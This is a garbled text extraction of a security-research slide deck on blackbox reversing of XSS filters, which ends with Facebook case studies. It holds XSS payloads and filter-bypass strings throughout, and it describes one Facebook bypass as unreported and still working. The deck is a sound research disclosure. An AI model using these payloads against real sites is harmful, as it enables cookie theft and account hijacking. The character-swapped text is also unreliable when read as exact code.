Sei sulla pagina 1di 37

Blackbox Reversing of XSS Filters

Alexander Sotirov

Web applications are the future

Reversing eb apps

blackbox reversing

ver! different environ"ent and tools

#ross$site scripting %XSS&

the 'strcp!( of eb app develop"ent

reversing and b!passing XSS filters


*ser generated content and Web +.,

)"ple"enting XSS filters

Reversing XSS filters

XSS in Facebook
.art )
*ser generated content
and Web +.,
Web +.,

*ser generated content



Aggregation of untrusted content

Significantl! increased attack surface

*ser generated content



1ighteight "arkup %BBcode2 Wikipedia&

1i"ited 30/1

Full 30/1 and 4avaScript

)"ages2 sound2 video

Attacker generated content

Social netorking

Sa"!5s /!Space or"

"ultiple -rkut or"s2 stealing bank info


3ot"ail and 6ahoo /ail cross$site scripting

or" ritten b! Sk!1ined in +,,+

"an! S7uirrel/ail cross$site scripting bugs


hacking Word.ress ith XSS

#ross site scripting %XSS&
<p>Hello <script>alert('XSS')</script></p>
Web securit! "odel
Sa"e origin polic!
.revents scripts fro" one do"ain fro"
"anipulating docu"ents loaded fro"
other do"ains
#ross site scripting allos us to execute
arbitrar! scripts on a page loaded fro"
another do"ain
What can XSS do9

Stealing data fro" eb pages

#apturing ke!strokes on a eb page

Stealing authentication cookies

Arbitrar! 300. re7uests ith

.art ))
)"ple"enting XSS filters
XSS filters

Re"ove all scripts fro" untrusted 30/1


/an! 30/1 features that allo scripting

.roprietar! extensions to 30/1

.arsing invalid 30/1

Broser bugs
Features that allo scripting
Script tags
<script src=!"s!>
;vent handler attributes
<body onload=!alert('XSS')!>
<p style=!bac#$ro%nd:%rl('"a&ascript:alert(')')!>
<im$ src=!"a&ascript:alert('XSS')!>
.roprietar! extensions to 30/1
X/1 data islands %);&
<xml src=!! id=!x!>
<span datasrc=!(x! data)ld=!c! data)ormatas=!html!>
4avaScript expressions in attribute %<S=&
<p id=!*+alert('XSS'),!>
#onditional co""ents %);&
<-../i) $te 01 23>
.arsing invalid 30/1

extra '>' before opening tag

<*11 b!te inside tag na"e

'?' separator beteen tag and attribute

no 7uotes around attribute value

"issing '@' in closing tag

Broser behavior is not docu"ented or
standardiAed. );B parses this as8
<script src=!"s!></script>
Broser bugs
)nvalid *0FC handling in )nternet ;xplorer D
<body )oo=!4x65! bar=! onload=alert(')7//!>
Firefox and );B8
<body )oo=!?!
bar=! onload=alert(')7//!>
<body )oo=!? bar=!
Attribute parsing in Firefox > +.,.,.+
<body onload-(89*():;<.=.>:7??//@43AB=alert(!XSS!)>
)"ple"enting XSS filters

String "atching filters

30/1 E-/ parsers


String "atching filters
Re"ove all script tags8

)nvalid 30/1 accepted b! brosers

;ncoding of attribute values and *R1s

*sing the filter against itself8


)nco"plete blacklists
30/1 E-/ parsers
<body onload=!alert(')!>
F. Build a E-/ tree fro" the input strea"

handle invalid *0FC se7uences

Appl! XSS filters to the E-/ tree

-utput the E-/ tree in a canonical for"

escape special characters

add closing tags here necessar!


re"ove knon bad tags and attributes

"ust be F,,G co"plete to be safe


allo onl! knon safe tags and attributes

safer than blacklisting

.art )))
Reversing XSS filters
Reversing XSS filters

Re"ote eb applications

no access to source code or binaries


li"ited b! bandidth and re7uest latenc!

dras attention

Blackbox reversing

send input and inspect the output

build a filter "odel based on its behavior

)terative "odel generation
F. Build an initial "odel of the filter
+. :enerate a test case
H. Send test case and inspect the result
=. *pdate the "odel
I. :o to step +
;xa"ple of parser reversing
0est case8
('..5xDD).each + @x@
data << !<p (+x.chr,a=''></p>!

hitespace regexp
/4x5E4t4r4n !'/3<

attribute na"e regexp


Fra"eork for XSS filter reversing

run a set of tests against a eb application

store the results

"anual anal!sis of the output

result diffing

Application "odules

abstract application specific details

sending data2 result parsing2 error detection

0est "odules

test generation functions

*sing the "odel

:ra""ar based anal!sis

build a gra""ar for the filter output

build a gra""ar for the broser parser

find a valid sentence in both gra""ars that

includes a >script@ tag

Rei"ple"ent the filter and fuAA it locall!

.art )J
XSS in Facebook
Facebook platfor"

0hird part! applications

application pages

content in user profiles

"essage and all post attach"ents


30/1 ith a fe restrictions

li"ited st!le sheet and scripting support


sandboxed 4avaScript
FB/1 processing
broser" funapp.exa""
30/1 FB/1
:;0 ?funapp?"l :;0 ?"l

Facebook serves as a prox! for

application content

FB/1 processing8

special FB/1 tags are replaced ith 30/1

non$supported 30/1 tags are re"oved

scripts are sandboxed

Reversing the FB/1 parser"
rite test case in

30/1 E-/ parser

Accepts and fixes invalid input

#anonicaliAed output

Whitelist of tags2 blacklist of attributes

Facebook XSS
)nvalid *0FC se7uences

input is parsed as AS#))

300. response headers specif! *0FC encoding

affects onl! );D

im$ src=!J! )oo=!4x65! bar=!onload=alert(')7//!>
eported and fixed in Februar!.
0his is here ) drop the ,da!
Attribute na"e parsing

"is"atch beteen Facebook and Firefox parsers

affects onl! Firefox > +.,.,.+

im$ src=!J! onload:=!alert(')!>
ot reported2 Facebook is still vulnerable.
Facebook Ee"o
.art J

Web +., sites are totall! screed

broken eb securit! "odel

undocu"ented broser behavior

no progra""ing language support

Blackbox reversing

the onl! a! to reverse "ost eb apps

e need better tools and auto"ation